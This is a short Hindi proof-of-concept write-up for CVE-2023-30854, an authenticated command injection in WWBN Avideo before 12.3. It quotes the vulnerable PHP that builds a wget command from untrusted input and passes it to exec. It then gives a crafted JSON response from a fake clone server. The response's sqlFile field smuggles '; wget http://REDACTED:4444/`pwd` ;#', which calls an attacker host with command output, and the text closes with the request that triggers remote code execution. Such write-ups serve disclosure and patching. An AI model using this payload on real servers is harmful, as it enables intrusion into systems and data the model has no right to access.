
अवधारणा-प्रमाण शोषण CVE-2023-30854 के लिए: WWBN Avideo < 12.3 में प्रमाणित OS कमांड इंजेक्शन, नकली क्लोन सर्वर प्रतिक्रिया के माध्यम से दूरस्थ कोड निष्पादन को सक्षम करता है।
CVE-2023-30854 WWBN Avideo < 12.3 प्रमाणित RCE
एक प्रमाणित एंडपॉइंट /plugin/CloneSite/cloneClient.json.php में OS कमांड इंजेक्शन भेद्यता हमलावरों को रिमोट कोड निष्पादन प्राप्त करने की अनुमति देती है।
भेद्य कोड:
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
हम एडमिन पैनल क्लोन साइट सुविधा के माध्यम से $objClone->cloneSiteURL को नियंत्रित कर सकते हैं।
/plugin/CloneSite/cloneClient.json.php {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php पर GET अनुरोध भेजता है। मैंने एक विशेष रूप से तैयार किया गया cloneServer.json.php होस्ट किया जो निम्नलिखित JSON डेटा प्रिंट करता है
{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/demo.avideo.com\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget http://REDACTED:4444/`pwd` ;#","videoFiles":[],"photoFiles":[]}
/plugin/CloneSite/cloneClient.json.php पर GET अनुरोध भेजें, फिर रिमोट कोड निष्पादन प्राप्त होता है।
